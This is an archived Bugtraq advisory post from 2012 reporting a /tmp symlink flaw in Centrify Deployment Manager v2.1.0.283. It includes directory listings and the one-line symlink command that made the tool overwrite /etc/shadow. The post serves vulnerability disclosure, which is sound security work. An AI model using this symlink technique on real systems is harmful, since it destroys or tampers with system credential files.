lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 4 Dec 2012 13:55:20 GMT
From: larry0@...com
To: bugtraq@...urityfocus.com
Subject: Centrify Deployment Manager v2.1.0.283

Centrify Deployment Manager v2.1.0.283

While at a training session for centrify, I noticed poor handling of files in /tmp. I was able to overwrite /etc/shadow with the contents of adcheckDMoutput.

I am sure there are more vulnerabilities to be exploit, maybe a local root - but being this is a training class I should probably focus.....

total 6680
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210

-rw-rw-r-- 1 clyde clyde     188 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib

[root@...new-cen tmp]# ls -l
total 6680

-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib

[root@...new-cen tmp]# ls -l
total 6688

-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 adcheckDMoutput 
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde     132 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib

[root@...new-cen tmp]# ls -l
total 6672
-rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh

# ln -s /etc/shadow adcheckDMoutput

After run:

# ls -l /etc/shadow
-r-------- 1 root root 3999 Dec 3 14:56 /etc/shadow

/etc/shadow has been overwritten with the contents of adcheckDMoutput.

I am also assuming the .210 appended to the end of files in /tmp is the major version number.

Larry W. Cashdollar
@_larry0 

Powered by blists - more mailing lists